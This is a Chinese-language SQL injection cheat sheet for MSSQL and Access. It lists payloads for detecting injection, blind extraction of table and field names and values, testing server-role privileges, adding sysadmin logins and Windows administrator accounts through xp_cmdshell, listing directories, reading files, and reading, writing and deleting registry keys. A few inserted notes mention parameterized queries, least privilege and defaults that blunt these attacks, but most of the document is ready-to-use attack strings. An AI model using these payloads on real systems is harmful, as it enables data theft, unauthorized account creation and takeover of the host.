1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
(注:这些探测之所以有效,是因为参数被直接拼接进了 SQL 语句;改用参数化查询后,同样的输入只会被当作普通数据处理。)
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
(注:IS_SRVROLEMEMBER 在当前登录名属于该角色时返回 1,否则返回 0。Web 应用所用的数据库登录名若按最小权限原则配置,不属于任何固定服务器角色、也不是 db_owner,上述判断均不成立。)
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
(注:xp_cmdshell 自 SQL Server 2005 起默认禁用,且默认只有 sysadmin 成员可以执行;sp_addlogin、sp_password 已被微软标记为弃用,分别由 CREATE LOGIN、ALTER LOGIN 取代。应用账户不属于任何服务器角色时,以上语句均会因权限不足而失败。)
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
(注:xp_regread、xp_regwrite 等属于微软未公开文档的扩展存储过程;加固基线通常建议限制其 EXECUTE 权限,并对这类调用做审计。)